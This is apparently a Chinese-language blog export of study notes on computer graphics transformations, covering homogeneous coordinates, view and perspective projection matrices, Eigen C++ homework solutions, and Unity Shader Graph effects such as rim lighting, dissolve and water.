    Why Homogeneous Coordinates 为什么引入齐次坐标

    • Translation cannot be represented in matrix form 平移变换不能用矩阵来表示

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}a&b\c&d\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}+\begin{bmatrix}t_x\t_y\end{bmatrix}$$

    因此,平移变换不是线性变换!

    • But we don’t want translation to be a special case 但我们不希望平移变换成为特例

    • Is there a unified way to represent all transformations? (and what’s the cost?) 用统一的方式描述所有变换?(代价是什么?)

    Solution: Homogenous Coordinates 解决办法:齐次坐标

    Add a third coordinate (w-coordinate) 增加一个维度

    • 2D point = $(x, y, {\color{Red}1})^T$
    • 2D vector = $(x, y, {\color{Red}0})^T$

    Matrix representation of translations 用矩阵描述所有变换

    $$\begin{pmatrix}x’\y’\w’\end{pmatrix}=\begin{pmatrix}1&0&t_x\0&1&t_y\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\1\end{pmatrix}=\begin{pmatrix}x+t_x\y+t_y\1\end{pmatrix}$$

    Valid operation if w-coordinate of result is 1 or 0 所增加维度的值不是 1 就是 0,这是因为:

    • vector + vector = vector
    • point – point = vector
    • point + vector = point
    • point + point = 它们的中点

    因此定义,在齐次坐标中:

    $$\begin{pmatrix}x\y\w\end{pmatrix}\text{ is the 2D point }\begin{pmatrix}x/w\y/w\1\end{pmatrix},w\neq0$$

    Affine Transformation 仿射变换

    Affine map = linear map + translation 仿射变换 = 线性变换 + 平移

    $$\begin{pmatrix}x{\prime}\y{\prime}\end{pmatrix}=\begin{pmatrix}a&b\c&d\end{pmatrix}\cdot\begin{pmatrix}x\y\end{pmatrix}+\begin{pmatrix}t_x\t_y\end{pmatrix}$$

    Using homogenous coordinates: 使用齐次坐标

    $$\begin{pmatrix}x’\y’\1\end{pmatrix}=\begin{pmatrix}a&b&t_x\c&d&t_y\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\1\end{pmatrix}$$

    2D Transformations 2D 变换

    Scale 缩放

    $$\mathbf{S}(s_x,s_y)=\begin{pmatrix}s_x&0&0\0&s_y&0\0&0&1\end{pmatrix}$$

    Rotation 旋转

    $$\mathbf{R}(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0\\sin\alpha&\cos\alpha&0\0&0&1\end{pmatrix}$$

    Translation 平移

    $$\mathbf{T}(t_x,t_y)=\begin{pmatrix}1&0&t_x\0&1&t_y\0&0&1\end{pmatrix}$$

    Inverse Transform 逆变换

    $$\mathbf{M^{-1}}$$

    Composing Transforms 复合变换

    Sequence of affine transforms $A_1, A_2, A_3, …$ 对于仿射变换序列 $A_1, A_2, A_3, …$

    • Compose by matrix multiplication 通过矩阵乘法进行合成
      • Very important for performance! 对性能非常重要!

    $$A_n(\ldots A_2(A_1(\mathbf{x})))=\mathbf{A}_n\cdots\mathbf{A}_2\cdot\mathbf{A}_1\cdot\begin{pmatrix}x\y\1\end{pmatrix}$$

    预乘 $n$ 个矩阵以获得表示组合变换的单个矩阵。

    Decomposing Complex Transforms 分解复合变换

    png

    How to rotate around a given point $c$? 如何绕空间任意一点 $c$ 旋转?

    1. Translate center to origin 平移回原点
    2. Rotate 旋转
    3. Translate back 平移回去

    $$\mathbf{T©}\cdot\mathbf{R(\alpha)}\cdot\mathbf{T(-c)}$$

    3D Transforms

    Use homogeneous coordinates again 再次使用齐次坐标:

    • 3D point = $(x, y, z, {\color{Red}1})^T$
    • 3D vector = $(x, y, z, {\color{Red}0})^T$

    In general, $(x, y, z, w) (w \ne 0)$ is the 3D point:

    $$(x/w, y/w, z/w)$$

    3D Transformations 3D 变换

    Use $4\times 4$ matrices for affine transformations 使用 $4\times 4$ 齐次坐标表示:

    $$\begin{pmatrix}x’\y’\z’\1\end{pmatrix}=\begin{pmatrix}a&b&c&t_x\d&e&f&t_y\g&h&i&t_z\0&0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\z\1\end{pmatrix}$$

    先应用线性变换,再平移。

    Lecture 04 Transformation Cont.

    Viewing (观测) transformation

    • View (视图) / Camera transformation
    • Projection (投影) transformation
    • Orthographic (正交) projection
    • Perspective (透视) projection

    3D Transformations 3D 变换

    Rotation around $x$-, $y$-, or $z$-axis 沿 $x$、$y$、$z$ 轴旋转:

    png

    $$\mathbf{R}_x(\alpha)=\begin{pmatrix}1&0&0&0\0&\cos\alpha&-\sin\alpha&0\0&\sin\alpha&\cos\alpha&0\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_y(\alpha)=\begin{pmatrix}\cos\alpha&0&\sin\alpha&0\0&1&0&0\-\sin\alpha&0&\cos\alpha&0\0&0&0&1\end{pmatrix}$$

    $$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

    Compose any 3D rotation from $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$? 让 $\mathbf{R}_x$, $\mathbf{R}_y$, $\mathbf{R}_z$ 构成任意三维旋转?

    $$\mathbf{R}_{xyz}(\alpha,\beta,\gamma)=\mathbf{R}_x(\alpha)\mathbf{R}_y(\beta)\mathbf{R}_z(\gamma)$$

    • So-called Euler angles 所谓的欧拉角
    • Often used in flight simulators: roll, pitch, yaw 常用于飞行模拟器:滚转、俯仰、偏航

    png

    Rodrigues’ Rotation Formula 罗德里格斯轮换公式

    绕轴 $n(n_x,n_y, n_z)$ 旋转角度 $\alpha$:

    $$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    View / Camera Transformation 视图变换

    • What is view transformation? 什么是视图变换?
    • Think about how to take a photo 考虑拍照
      • Find a good place and arrange people (model transformation) 摆好场景:模型变换
      • Find a good “angle” to put the camera (view transformation) 选好视角:视图变换
      • Cheese! (projection transformation) 拍照:投影变换
    • How to perform view transformation? 如何进行视图变换?
      • Define the camera first 首先定义一个相机
        • Position 位置 $\vec{e}$
        • Look-at / gaze direction 注视/凝视方向 $\hat g$
        • Up direction 上方向 $\hat t$

    png

    • Key observation 重点观察

      • If the camera and all objects move together, the “photo” will be the same 如果相机和所有物体一起移动,“照片”将是相同的
    • How about that we always transform the camera to 不如我们总是把相机变成

      • The origin, up at $Y$, look at $-Z$ 处于原点,上方为 $Y$ 轴,看着 $-Z$ 轴方向
      • And transform the objects along with the camera 并随相机变换对象
    • Transform the camera by $M_{view}$

    • So it’s located at the origin, up at $Y$, look at $-Z$ 所以它位于原点,向上看 $Y$,看 $-Z$

    • $M_{view}$ in math? $M_{view}=R_{view}T_{view}$

      • Translates $e$ to origin

        $T_{view}=\begin{bmatrix}1&0&0&-x_e\0&1&0&-y_e\0&0&1&-z_e\0&0&0&1\end{bmatrix}$

      • Rotates $g$ to $-Z$、Rotates $t$ to $Y$、Rotates ($g \times t$) To $X$

        • Difficult to write! 将 $g$ 旋转到 $-Z$ 轴、将 $t$ 旋转到 $Y$ 轴、将 ($g \times t$) 旋转到 $X$ 轴,描述成矩阵是很复杂的!

        • 考虑求其逆变换

          $R_{view}^{-1}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&x_{t}&x_{-g}&0\y_{\hat{g}\times\hat{t}}&y_{t}&y_{-g}&0\z_{\hat{g}\times\hat{t}}&z_{t}&z_{-g}&0\0&0&0&1\end{bmatrix}$

        • 由于旋转矩阵是正交矩阵,其逆为它的转置,因此易求得 $R_{view}$

          $R_{view}=\begin{bmatrix}x_{\hat{g}\times\hat{t}}&y_{\hat{g}\times\hat{t}}&z_{\hat{g}\times\hat{t}}&0\x_t&y_t&z_t&0\x_{-g}&y_{-g}&z_{-g}&0\0&0&0&1\end{bmatrix}$

    • Summary 总结

      • Transform objects together with the camera 与摄影机一起变换对象
      • Until camera’s at the origin, up at $Y$, look at $-Z$ 直到相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向。
    • Also known as ModelView Transformation 也称为 ModelView 变换

    Projection Transformation 投影变换

    • Projection in Computer Graphics 投影在计算机图形学
      • 3D to 2D
      • Orthographic projection 正交投影
      • Perspective projection 透视投影

    png

    Orthographic Projection 正交投影

    • A simple way of understanding 简单的理解方法

      • Camera located at origin, looking at $-Z$, up at $Y$ (looks familiar?) 相机移动到原点,以 $Y$ 轴为上方,视点在 $-Z$ 轴方向
      • Drop $Z$ coordinate 删除 $Z$ 坐标
      • Translate and scale the resulting rectangle to $[-1, 1]^2$ 将生成的矩形平移并缩放到 $[-1,1]^2$
    • In General

      • We want to map a cuboid $[l, r]\times [b, t]\times [f, n]$ to the “canonical” cube $[-1, 1]^3$

        我们想把长方体 $[l,r]\times[b,t]\times[f,n]$ 映射到“规范(正则、规范、标准)” 的立方体 $[-1,1]^3$

    • Slightly different orders (to the “simple way”)

      • Center cuboid by translating 通过平移使长方体居中
      • Scale into “canonical” cube 缩放为“规范”多维数据集

    $r,l,t,b,n,f$ 的定义如下所示:

    $x$ 轴坐标范围:$[l,r]$

    $y$ 轴坐标范围:$[b,t]$

    $z$ 轴坐标范围:$[f,n]$

    png

    • Transformation matrix?

      • Translate (center to origin) first, then scale (length/width/height to 2) 首先平移(中心到原点)然后缩放(长度/宽度/高度到 2)

        $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\0&\frac2{t-b}&0&0\0&0&\frac2{n-f}&0\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\0&1&0&-\frac{t+b}2\0&0&1&-\frac{n+f}2\0&0&0&1\end{bmatrix}$

    • Caveat 警告

      • Looking at / along $-Z$ is making near and far not intuitive ($n > f$) 观察/沿着 $-Z$ 轴使远近不直观($n>f$)
        • $n$ 和 $f$ 是负的,$|f|>|ns’s’s’s’s’s|$。
      • FYI: that’s why OpenGL (a Graphics API) uses left hand coords. 仅供参考:这就是 OpenGL(图形 API)使用左手坐标的原因。

    Perspective Projection 透视投影

    • Most common in Computer Graphics, art, visual system 最常见于计算机图形学、艺术、视觉系统
    • Further objects are smaller 其他物体较小
    • Parallel lines not parallel; converge to single point 平行线不平行;收敛到单点

    png

    • How to do perspective projection 如何进行透视投影

      • First “squish” the frustum into a cuboid ($n \to n$, $f \to f$) ($M_{persp\to ortho}$)

        首先将截头体“压扁”成长方体($n\to n$,$f\to f$)($M_{persp\to ortho}$)

      • Do orthographic projection ($M_{ortho}$, already known!) 做正交投影($M_{ortho}$,已经知道了!)

    png

    • In order to find a transformation 为了找到变换(推导出矩阵 $M_{persp\to ortho}$)

      • Recall the key idea: Find the relationship between transformed points $(x’, y’,z’)$ and the original points $(x, y, z)$

        回想关键思想:找到转换之间的关系点 $(x’, y’,z’)$ 和原始点 $(x, y, z)$

        $y^{\prime}=\frac nzy$

        $x^{\prime}=\frac nzx$

    png

    • In homogeneous coordinates, 齐次坐标下,

      $\begin{pmatrix}x\y\z\1\end{pmatrix}\Rightarrow\begin{pmatrix}nx/z\ny/z\\text{unknown}\1\end{pmatrix}==\begin{pmatrix}nx\ny\\text{still unknown}\z\end{pmatrix}$

    • So the “squish” (persp to ortho) projection does this 所以“挤压”(透视到正交)投影可以做到这一点

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\y\z\1\end{pmatrix}=\begin{pmatrix}nx\ny\\text{unknown}\z\end{pmatrix}$

    • Already good enough to figure out part of $M_{persp\to ortho}$ 可以求得 $M_{persp\to ortho}$ 的一部分:

      $M_{persp\to ortho}=\begin{pmatrix}n&0&0&0\0&n&0&0\?&?&?&?\0&0&1&0\end{pmatrix}$

    • Observation: the third row is responsible for $z’$ 观察:第三排负责 $z’$

      • Any point on the near plane will not change 近平面上的任何点都不会改变

      • Any point’s z on the far plane will not change 远平面上的任何点的 $z$ 都不会改变

    • Any point on the near plane will not change 近平面上的任何点都不会改变

      $M_{persp\to ortho}^{(4\times4)}\begin{pmatrix}x\y\z\1\end{pmatrix}=\begin{pmatrix}nx\ny\\text{unknown}\z\end{pmatrix}\overset{\text{replace z with n}}{\operatorname*{\to}}\begin{pmatrix}x\y\n\1\end{pmatrix}\Rightarrow\begin{pmatrix}x\y\n\1\end{pmatrix}==\begin{pmatrix}nx\ny\n^2\n\end{pmatrix}$

    • So the third row must be of the form $(0\ 0\ A\ B)$ 所以第三行的形式必须是$(0\ 0\ A\ B)$

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2$

    • What do we have now?

      $\begin{pmatrix}0&0&A&B\end{pmatrix}\begin{pmatrix}x\y\n\1\end{pmatrix}=n^2\to An+B=n^2$

    • Any point’s z on the far plane will not change 近平面上的任何点都不会改变

      $\begin{pmatrix}0\0\f\1\end{pmatrix}\Rightarrow\begin{pmatrix}0\0\f\1\end{pmatrix}==\begin{pmatrix}0\0\f^2\f\end{pmatrix}\quad\to\quad Af+B=f^2$

    • Solve for $A$ and $B$

      $\begin{aligned}An+B&=n2\Af+B&=f2\end{aligned}\quad\to\quad\begin{aligned}A&=n+f\B&=-nf\end{aligned}$

    • Finally, every entry in $M_{persp\to ortho}$ is known!

    • What’s next?

      • 完成正交投影($M_{ortho}$)
      • $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    HW0

    环境配置

    WSL2 下:

    1
    2
    sudo apt-get install xfce4-terminal
    sudo apt-get install xfce4

    配置环境变量:

    1
    echo "export DISPLAY=localhost:0">> ~/.bashrc

    MobaXterm 下配置 wsl2:

    png

    开跑!

    png

    安装库:

    1
    2
    3
    4
    sudo apt update
    sudo apt install g++ gdb cmake
    sudo apt install libopencv-dev libeigen3-dev
    sudo apt install libglu1-mesa-dev freeglut3-dev mesa-common-dev xorg-dev

    Windows 下的 VSCode,安装 wsl 插件,点击左下角,连接 wsl。

    png

    打开作业模板,有如下命令:

    • mkdir build: 创建名为 build 的文件夹。
    • cd build: 移动到 build 文件夹下。
    • cmake ..: 注意其中 ’…’ 表示上一级目录,若为 ’.’ 则表示当前目录。
    • make: 编译程序,错误提示会显示在终端中。
    • ./Transformation:若上一步无错误,则可运行程序(这里 Transformation 为可执行文件名,可参照 CMakeLists.txt 中修改)。

    写一个 compile.sh 便于编译:

    1
    2
    3
    4
    5
    6
    7
    rm -rf build
    mkdir build
    cd build
    cmake ..
    make
    ./Transformation
    cd ../

    修改权限:

    1
    chmod a+x compile.sh

    开跑!

    1
    sh compile.sh

    作业

    写一个用于的 sh:

    1
    2
    3
    4
    5
    6
    rm -rf build
    mkdir build
    cd build
    cmake ..
    make -j4
    cd ../

    示例代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>

    int main(){

    // Basic Example of cpp
    std::cout << "Example of cpp \n";
    float a = 1.0, b = 2.0;
    std::cout << a << std::endl;
    std::cout << a/b << std::endl;
    std::cout << std::sqrt(b) << std::endl;
    std::cout << std::acos(-1) << std::endl;
    std::cout << std::sin(30.0/180.0*acos(-1)) << std::endl;

    // Example of vector
    std::cout << "Example of vector \n";
    // vector definition
    Eigen::Vector3f v(1.0f,2.0f,3.0f);
    Eigen::Vector3f w(1.0f,0.0f,0.0f);
    // vector output
    std::cout << "Example of output \n";
    std::cout << v << std::endl;
    // vector add
    std::cout << "Example of add \n";
    std::cout << v + w << std::endl;
    // vector scalar multiply
    std::cout << "Example of scalar multiply \n";
    std::cout << v * 3.0f << std::endl;
    std::cout << 2.0f * v << std::endl;

    // Example of matrix
    std::cout << "Example of matrix \n";
    // matrix definition
    Eigen::Matrix3f i,j;
    i << 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0;
    j << 2.0, 3.0, 1.0, 4.0, 6.0, 5.0, 9.0, 7.0, 8.0;
    // matrix output
    std::cout << "Example of output \n";
    std::cout << i << std::endl;
    // matrix add i + j
    // matrix scalar multiply i * 2.0
    // matrix multiply i * j
    // matrix multiply vector i * v

    return 0;
    }

    题目

    给定一个点 $P=(2,1)$, 将该点绕原点先逆时针旋转 $45^\circ$,再平移
    $(1,2)$,计算出变换后点的坐标(要求用齐次坐标进行计算)。


    $P$ 以齐次坐标的表示形式为 $(2, 1, 1)^T$

    旋转矩阵为 $R(\pi/4)=\begin{bmatrix}\cos \pi/4 & -\sin \pi/4 & 0 \\sin \pi/4 & \cos \pi/4 & 0 \0 & 0 & 1 \end{bmatrix}$

    平移矩阵 $T(1, 2)=\begin{bmatrix}1 & 0 & 1 \0 & 1 & 2 \0 & 0 & 1\end{bmatrix}$

    最终坐标为 $TRP$。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    #include<cmath>
    #include<eigen3/Eigen/Core>
    #include<eigen3/Eigen/Dense>
    #include<iostream>
    #define PI 3.1415926535
    using namespace std;
    using namespace Eigen;

    int main()
    {
    float theta = PI / 4.0f;
    Vector3f P(2.0f, 1.0f, 1.0f);
    Matrix3f R, T;
    R <<
    cos(theta), -sin(theta), 0,
    sin(theta), cos(theta), 0,
    0, 0, 1;
    T <<
    1, 0, 1,
    0, 1, 2,
    0, 0, 1;
    cout << T * R * P << endl;
    return 0;
    }
    1
    2
    3
    1.70711
    4.12132
    1

    HW1

    本次作业的任务是填写一个旋转矩阵和一个透视投影矩阵。给定三维下三个点 $v_0(2.0, 0.0,−2.0)$, $v_1(0.0, 2.0,−2.0)$, $v_2(−2.0, 0.0,−2.0)$, 你需要将这三个点的坐标变换为屏幕坐标并在屏幕上绘制出对应的线框三角形(在代码框架中,我们已经提供了draw_triangle 函数,所以你只需要去构建变换矩阵即可)。

    • get_model_matrix(float rotation_angle): 逐个元素地构建模型变换矩阵并返回该矩阵。

    代公式:$$\mathbf{R}_z(\alpha)=\begin{pmatrix}\cos\alpha&-\sin\alpha&0&0\\sin\alpha&\cos\alpha&0&0\0&0&1&0\0&0&0&1\end{pmatrix}$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    Eigen::Matrix4f get_model_matrix(float rotation_angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the model matrix for rotating the triangle around the Z axis.
    // Then return it.

    float angle = rotation_angle * MY_PI / 180.0f;

    Eigen::Matrix4f translate;
    translate << std::cos(angle), -std::sin(angle), 0, 0,
    std::sin(angle), std::cos(angle), 0, 0,
    0, 0, 1, 0,
    0, 0, 0, 1;
    model = translate * model;
    return model;
    }
    • get_projection_matrix(float eye_fov, float aspect_ratio, float zNear, float zFar): 使用给定的参数逐个元素地构建透视投影矩阵并返回该矩阵。

    代公式:$\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$

    其中:

    $M_{persp\to ortho}$,映射到“规范(正则、规范、标准)” 的立方体 $[-1,1]^3$,因此:

    $M_{persp\to ortho}=\begin{bmatrix}\mathrm{zNear}&0&0&0\0&\mathrm{zNear}&0&0\0&0&\mathrm{zNear}+\mathrm{zFar}&-\mathrm{zNear}\times\mathrm{zFar}\0&0&1&0\end{bmatrix}$


    $M_{ortho}=\begin{bmatrix}\frac2{r-l}&0&0&0\0&\frac2{t-b}&0&0\0&0&\frac2{n-f}&0\0&0&0&1\end{bmatrix}\begin{bmatrix}1&0&0&-\frac{r+l}2\0&1&0&-\frac{t+b}2\0&0&1&-\frac{n+f}2\0&0&0&1\end{bmatrix}$

    png

    具体地,如上图,zNear 即为 $n$,zFar 即为 $z$,$\frac yz=\tan{(\mathrm{eye_fov}/2)}$。

    由于右手坐标系 $n$ 和 $f$ 为负,因此:

    1
    2
    3
    4
    5
    6
    7
    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    最后 $\begin{aligned}M_{persp}=M_{ortho}M_{persp\to ortho}\end{aligned}$ 即为所求。

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    Eigen::Matrix4f get_projection_matrix(float eye_fov, float aspect_ratio,
    float zNear, float zFar)
    {
    // Students will implement this function

    Eigen::Matrix4f projection = Eigen::Matrix4f::Identity();

    // TODO: Implement this function
    // Create the projection matrix for the given parameters.
    // Then return it.

    Eigen::Matrix4f M_P;
    M_P << zNear, 0, 0, 0,
    0, zNear, 0, 0,
    0, 0, zNear + zFar, -(zNear * zFar),
    0, 0, 1, 0;

    float angle = eye_fov * MY_PI / 180.0f;
    float n = -zNear;
    float f = -zFar;
    float t = std::tan(angle / 2) * n;
    float b = -t;
    float r = t * aspect_ratio;
    float l = -r;

    Eigen::Matrix4f M_T;
    M_T << 1, 0, 0, -(r + l) / 2,
    0, 1, 0, -(t + b) / 2,
    0, 0, 1, -(n + f) / 2,
    0, 0, 0, 1;

    Eigen::Matrix4f M_S;
    M_S << 2 / (r - l), 0, 0, 0,
    0, 2 / (t - b), 0, 0,
    0, 0, 2 / (f - n), 0,
    0, 0, 0, 1;

    projection = M_T * M_S * M_P * projection;
    return projection;
    }

    运行时:

    • n = -0.1
    • f = -50
    • t = -0.0414214
    • b = 0.0414214
    • r = -0.0414214
    • l = 0.0414214

    提高项:在 main.cpp 中构造一个函数,该函数的作用是得到绕任意
    过原点的轴的旋转变换矩阵。Eigen::Matrix4f get_rotation(Vector3f axis, float angle)

    代公式:$$\mathbf{R}(\mathbf{n},\alpha)=\cos(\alpha)\mathbf{I}+(1-\cos(\alpha))\mathbf{n}\mathbf{n}^T+\sin(\alpha)\underbrace{\begin{pmatrix}0&-n_z&n_y\n_z&0&-n_x\-n_y&n_x&0\end{pmatrix}}_{\mathbf{N}}$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    Eigen::Matrix4f get_rotation(Vector3f axis, float angle)
    {
    Eigen::Matrix4f model = Eigen::Matrix4f::Identity();

    float alpha = angle * MY_PI / 180.0f;
    float nx = axis[0];
    float ny = axis[1];
    float nz = axis[2];
    Eigen::Matrix3f M;
    M <<
    0, -nz, ny,
    nz, 0, -nx,
    -ny, nx, 0;
    Eigen::Matrix3f R = std::cos(alpha) * Eigen::Matrix3f::Identity() + (1 - std::cos(alpha)) * axis * axis.transpose() + std::sin(alpha) * M;
    Eigen::Matrix4f translate = Eigen::Matrix4f::Identity();
    translate.block<3, 3>(0, 0) = R;

    model = translate * model;
    return model;
    }
    ]]>
    @@ -4312,7 +4312,7 @@ /posts/Unity-Shader%20Graph/ - 资源

    课程

    最简明的图形渲染流程解说——别被图形学吓到,入门

    图形渲染流程:

    几何阶段

    • 模型

      • 模型顶点 $XYZ$ 坐标

      • 模型矩阵 $M$

    • 世界(游戏场景)

      • 世界空间坐标
        • 模型空间到世界空间的转换过程:世界空间坐标 $= M\times$ 顶点坐标
    • 相机

      • 观察矩阵 $V$
      • 观察空间坐标
        • 世界空间到观察空间的转换过程:观察空间坐标 $= V\times M\times$ 顶点坐标
    • 投影

      • 投影矩阵 $P$
      • 投影坐标
        • 观察空间到投影的转换过程:投影坐标 $= P\times V\times M\times$ 顶点坐标

    ​ 由于矩阵乘法满足结合律,因此我们将引入的三个矩阵结合称为 $MVP$ 矩阵。($MVP$ 矩阵乘以坐标,就完成了坐标的完整变化,这个过程被称为几何阶段

    ​ 要对顶点坐标做额外的处理,称之为顶点着色器 Vertex Shader


    光栅化

    ​ 几何阶段结束后,还需要进行光栅化,才可以一个个像素点地显示。

    ​ 在光栅化阶段,计算机需要知道这些屏幕像素需要涂上什么样的颜色,是片元着色器 Fragment Shader需要完成的工作。


    通用着色器又叫顶点-片元着色器,因此两种着色器加起来才是完整的 Shader。

    01. 第一个光照 shader

    ​ URP / HDRP 支持 ShaderGraph。

    • Lit Shader Graph,光照模板,相当于以前的 PBR 节点。

    • Unlit Shader Graph,无光照模板

    png

    ​ 新建一个 Lit Shader Graph,打开之。

    png

    • 左边的面板可以控制最终显示在 Material 面板上的参数。

    • 中间的节点控制 Shader 逻辑。

    • 右边的 Graph Inspector 用于设置节点属性(Node Settings)和全局属性(Graph)。

    ​ 课程的示例 Shader Graph。

    • MainTex 是可设置的 Texture2D 类。
    • Sample Texture 2D 节点将 Texture 坐标转成 RGBA 颜色信息输出。
    • MainColor 是可设置的 Color 类。
    • Multiply 节点将两种颜色 A 和 B 相乘成一种颜色 Out 输出。
    • ColorTemp 和 ColorTint 都是可设置的 Float 数,在 Node Settings 以 Slider 形式,范围在 0 到 1 之间。
      • ColorTemp 色温越小越蓝,越大越黄。
      • ColorTint 色调越小越绿,越大越粉。
    • White Balance 节点用于白平衡处理。
    • 最后将输出的颜色应用在 Fragment 的 BaseColor 上。

    ​ 在 GameObject 上的效果:

    png

    01-1 光照补充与 SubGraph

    png

    ​ 新建一个 Shader Graph,绑定 Material,再绑定到模型上。

    jpg

    ​ 一阵操作 Shader Graph,使得 Shader Graph 可以支持:

    • MainTex 贴图
    • Normal 法线贴图
    • Matallic 金属度贴图
    • Smoothness 光滑度
    • Emission 自发光贴图
    • EmissionOn 控制自发光是否打开
    • EmissionColor 自发光颜色
    • AO 环境光屏蔽贴图

    ​ 选中这些节点,右键 Covert To Sub Graph。

    png

    ​ 这些节点就以一个 SubGraph 的形式展示。

    02. 轮廓光/边缘光

    png

    ​ 根据原模型提供的漫反射贴图 MainTex、法线贴图 NormalTex、金属度贴图 MetalTex、自发光贴图 EmissionTex 创建 Shader Graph 节点。

    png

    ​ 创建轮廓光效果:

    • Fresnel Effect 节点,创建轮廓光
    • RimPower,Float 属性,控制轮廓光强度,值越接近 0,轮廓光越发散
    • RimColor,Color 属性,控制轮廓光颜色
    • Multiply 节点,将 Fresnel Effect 节点输出的颜色值和 RimColor 相乘,获得带颜色的轮廓光
    • Add 节点,将轮廓光与轮廓光贴图相结合
      • 为什么要用 Add 而不是 Multiply?因为轮廓光贴图几乎全黑,使用 Multiply 会导致最后输出也几乎全黑

    png

    ​ 最终效果。

    03. 溶解

    png

    ​ 溶解效果需要在 Graph Inspector 里打开 Alpha Cliping。

    • Simple Noise 节点控制溶解形态,连接至 Alpha。

    • Noise Scale 控制溶解图案大小。

    • ClipRate 控制 Alpha Clip Threshold,Alpha 值低于 ClipRate 的点将不会被渲染。

    png

    ​ 添加溶解自发光边缘。

    • EdgeWidth 控制边缘宽度。
    • ClipRate 和 EdgeWitdh 经过 Add 节点叠加,输出值和 Simple Noise 的输出作为 Step 节点的输入,得到一张二值化图。
    • 二值化图和 EdgeColor 节点作为 Multiply 节点的输入,给溶解边缘染色,最后连上 Emission。

    png

    ​ 演示效果。

    png

    ​ 如果要利用模型自带的 Emission 贴图,还要再整个 Add 节点,最后再连 Emission 节点。

    png

    ​ 可以使用代码控制 ClipRate 的值来控制消融状态。

    ​ 如果要让物体自动消融,则可以使用 Time 节点连着 Remap 替换 ClipRate 来让物体自动消融。

    04. 水面(上)

    png

    • 水面是透明的,Surface Type 设成 Transparent。

    • 水面没有阴影,关闭 Cast Shadows。

    png

    ​ 检测与岸边的相交边缘,不透明的物体与半透明的物体之间的边缘检测,需要依靠屏幕深度来完成,打开它。

    png

    场景深度节点深度(Scene Depth,Sampling 为 Eye,包含透明像素)减去屏幕空间的 $W$ 向量(Screen Position,Mode 为 Raw,不包含透明像素)就是不透明物体与半透明物体相交的边缘。

    png

    ​ 预览结果。靠近水面边缘的地方呈现黑色,表明场景深度有效。

    png

    • 增加一个 Depth,控制深浅强度。

    • Strength 连 Multiply 调整修改力度。

    png

    • Clamp 将值钳制在 0 到 1 之间。
    • ShallowColor 和 Deep Color 控制水波颜色。

    png

    ​ 浏览效果,此时水已经被染色。

    png

    ​ Lerp 分理出 Alpha 通道,以显示水的透明效果。

    ​ 设定好 ShallowColor 和 Deep Color 的 Alpha 值才有效。

    png

    ​ 浏览效果,此时水呈现透明色。

    png

    ​ 给水增加法线贴图。

    ​ 共有两种法线:

    • FirstNormal
    • SecondNormal

    ​ SampleTexture2D 的 Type 记得选 Normal。两个法线贴图用 Add 节点相加。

    • Tiling And Offset 控制法线贴图的缩放和平移。
    • Normal Strength 调整法线强度,最后连片元着色器的 Normal。

    png

    ​ 浏览效果。可以正确渲染法线了。

    png

    ​ 将 NormalStrength 与 边缘信息再进行 Lerp 运算,使得法线贴图考虑边缘信息。

    png

    ​ 给法线贴图的 Tiling And Offset 用 Time 控制,以达到水波流动的动态效果。

    png

    ​ 在 Scene 里打开 Always Refresh,便可浏览到水流实时流动的效果。

    png

    ​ 接下来修改顶点着色器,只需要修改模型的 Y 坐标即可。

    ​ 用 Gradient Noise 给模型的 Y 坐标做一个扰动,后面用 Time、Multiply、Tiling And Offset 控制扰动属性。

    png

    ​ 浏览效果,此时物体发生了形变。

    png

    ​ 增加 Displacement 控制扰动强度。

    png

    ​ 预览结果。通过修改 Displacement 的值以修改扰动强度。

    05. 水面(下)

    png

    ​ 为了给水面增加波光粼粼的效果,使用一个 Float 类型,范围 $[0, 1]$ 的 Smoothness 来控制片元着色器的 Smoothness。

    png

